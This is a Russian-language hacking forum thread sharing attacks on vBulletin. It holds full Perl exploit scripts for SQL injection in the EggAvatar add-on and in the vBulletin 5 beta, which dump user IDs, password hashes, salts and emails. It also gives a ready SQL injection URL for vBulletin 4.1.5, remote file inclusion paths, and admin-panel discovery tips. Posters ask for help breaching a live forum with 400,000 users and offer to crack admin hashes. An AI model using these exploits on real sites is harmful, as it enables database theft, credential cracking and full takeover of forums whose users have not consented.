На ветке vBulletin 3.8.x присутствует SQL инъекция в файле eggavatar.php, он находится в корневой директории сайта. Если при обращении к site/eggavatar.php сайт выдал не 404 Not Found, то воспользуйтесь сплоитом: PHP: #!/usr/bin/env perl use LWP::UserAgent; sub banner{ print "###################################\n"; print "############ DSecurity ############\n"; print "###################################\n"; print "# Email:dsecurity.vn[at]gmail.com #\n"; print "###################################\n"; } if(@ARGV<5){ print "Usage: $0 address username password number_user sleeptime\n"; print "Example: $0 http://localhost/vbb test test 10 10\n"; exit(); } $ua=LWP::UserAgent->new(); $ua->agent("DSecurity"); $ua->cookie_jar({}); sub login(@){ my $username=shift; my $password=shift; my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login'); $req->content_type('application/x-www-form-urlencoded'); $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf="); my $res = $ua->request($req); } sub v_request{ #Declare $print = $_[0]; $select = $_[1]; $from = $_[2]; $where = $_[3]; $limit = $_[4]; $sleep = $ARGV[4]; if ($from eq '') {$from = 'information_schema.tables';} if ($where eq '') {$where = '1';} if ($limit eq '') {$limit = '0';} if ($sleep eq '') {$sleep = '10';} # Create a request my $req = HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php'); $req->content_type('application/x-www-form-urlencoded'); $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1"); # Pass request to the user agent and get a response back my $res = $ua->request($req); #print $res->content; if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/) {$test = $3}; sleep($sleep); return $print.$test."\n"; } &banner; print "\n################################################ ################################################## ###########\n"; print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #\n"; print "# Date:06-03-2011 #\n"; print "# Author: DSecurity #\n"; print "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n"; print "# Version: 2.3.2 #\n"; print "# Tested on: vBulletin 3.8.0 #\n"; print "################################################## ################################################## #########\n"; #login login($ARGV[1],$ARGV[2]); #Foot print print v_request('MySQL version: ','@@version'); print v_request('Data dir: ','@@datadir'); print v_request('User: ','user()'); print v_request('Database: ','database()'); #Get user for($i=1;$i<=$ARGV[3];$i++){ print "-----------------------------------------\n"; print $id = v_request('ID: ','userid','user','1',$i-1); if($id =~ /(ID:)s(.*)/){ print v_request('Group: ','usergroupid','user','userid='.$2); print v_request('Username: ','username','user','userid='.$2); print v_request('Password: ','password','user','userid='.$2); print v_request('Salt: ','salt','user','userid='.$2); print v_request('Email: ','email','user','userid='.$2); } }
Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion Кто-то пробовал? Все облазил-нашел только следующее # Exploit : # # http://www.site.com/path/includes/class_block.php?classfile=[shell code] # # http://www.site.com/path/vb/vb.php?filename=[shell code] # # http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code] Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???
Недавно искал новый сплоит под vBulletin. Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея: Code: http://1337day.com/exploit/description/20417 Описание гласило:
Эксплоит оказался не рабочим, но что-то делать было нужно. Мой вгляд пал на только что обновленную булку до версии: 4.1.5 Code: mmoru.com Зарегистрировавшись , я обратил внимание что на самом сайте стоит движек vBuletin на котором возможно писать статьи. Проверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5. Название: Уязвимость в vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments) Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос. Пример: PHP: : http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1 После чего видим стандартную ошибку БД форума, следовательно открываем исходный код страницы и видим: PHP: <!-- Database error in vBulletin 4.1.5: Invalid SQL: SELECT permissionsfrom, hidden, setpublish, publishdate, userid FROM ds23fSDdfsdf_cms_node WHERE nodeid = -1599 or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a); MySQL Error : Duplicate column name '5.1.49-3' Error Number : 1060 Request Date : Tuesday, February 12th 2013 @ 01:12:33 PM Error Date : Tuesday, February 12th 2013 @ 01:12:33 PM Script : http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599%20or(1,2)=(select*from(select%20name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1 Referrer : IP Address : 127.0.0.1 Username : Hacker Classname : vB_Database MySQL Version : --> С вами были Piv8Team (priv8.ru)
vBulletin 5 Beta XX SQLi 0day Code: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; use MIME::Base64; system $^O eq 'MSWin32' ? 'cls' : 'clear'; print " +===================================================+ | vBulletin 5 Beta XX SQLi 0day | | Author: Orestis Kourides | | Web Site: www.cyitsec.net | +===================================================+ "; if (@ARGV != 5) { print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n"; exit; } $host = $ARGV[0]; $path = $ARGV[1]; $username = $ARGV[2]; $password = $ARGV[3]; $magicnum = $ARGV[4]; $encpath = encode_base64('http://'.$host.$path); print "[+] Logging\n"; print "[+] Username: ".$username."\n"; print "[+] Password: ".$password."\n"; print "[+] MagicNum: ".$magicnum."\n"; print "[+] " .$host.$path."auth/login\n"; my $browser = LWP::UserAgent->new; my $cookie_jar = HTTP::Cookies->new; my $response = $browser->post( 'http://'.$host.$path.'auth/login', [ 'url' => $encpath, 'username' => $username, 'password' => $password, ], Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'', User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0', ); $browser->cookie_jar( $cookie_jar ); my $browser = LWP::UserAgent->new; $browser->cookie_jar( $cookie_jar ); print "[+] Requesting\n"; my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote', [ 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1=1', ], User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0', ); $data = $response->content; if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 }; print "\n"; exit 1;
Обход ограничений безопасности в vBulletin Дата публикации: 10.10.2013 Дата изменения: 10.10.2013 Всего просмотров: 1104 Опасность: Высокая Наличие исправления: Инстуркции по устранению Количество уязвимостей: 1 CVSSv2 рейтинг: (AV:N/AC:L/Au:N/C/I/A/E:H/RL:W/RC:C) = Base:7.5/Temporal:7.1 CVE ID: Нет данных Вектор эксплуатации: Удаленная Воздействие: Обход ограничений безопасности CWE ID: Нет данных Наличие эксплоита: Активная эксплуатация уязвимости Уязвимые продукты: vBulletin 4.x vBulletin 5.x Уязвимые версии: vBulletin версии 4.x, 5.x Описание: Уязвимость позволяет удаленному пользователю получить административный доступ к приложению. Уязвимость существует из-за неизвестной ошибки в сценарии /install/upgrade.php. Удаленный пользователь может с помощью специально сформированного запроса создать новую административную учетную запись и получить полный контроль над приложением. Уязвимость активно эксплуатируется в настоящее время. URL производителя: http://www.vbulletin.com/ Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временно решения производитель рекомендует удалить установочные директории /install/ или /core/install/. Ссылки: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5 http://www.vbulletin.org/forum/showthread.php?p=2443431 где взять POC?
Небольшая заметка о "быстром" поиске админки. В случае, когда у Вас есть администраторский аккаунт, но нет доступа в админку, по причине "админ захотел поиграть в кошки-мышки и переименовал админку", дабы не брутить и не нагружать сервер кучей бесполезных логов, поможет следующий способ: заходим в профиль любого пользователя (forum/member.php?u=2), видим кнопку "Edit Profile / Редактировать учётную запись". По ссылке - как раз адрес админки. VB >= 2.8.6 Другие версии не проверял.
Я уже подобное писал выше, только не стоит забывать, что данный способ работает если переименованная админка прописана в config.php Если она не прописана в конфиге то не найти.
Залили другу через шелл такую штуку Vbulletin activity Page Denial of Service, сам не проверял кому то может пригодится
В курсе кто про Vbulliten 2.2.9 ? нашел там 4 SQL Injection но они все time based не могу раскрутить да и сурсов форума не найти. PS там еще крутится 3.7.3 и аккаунт модератора есть. на 3.7.3 admincp basic авторизация. на 2.2.9 прост admincp шелл думаю залить труда не составит дырявый форум как друшлак Опыт у меня большой, но ска скулю не могу раскрутить поможет, кто получить доступ? PS,s 400 000 пользователей. PS.S У меня сервис HashDB расшифровать не составит труда хеши админов.
https://pste.eu/p/PPQZ.html Странно, что используют логи сервера, по моему инклуд временных файлов будет намного универсальнее.
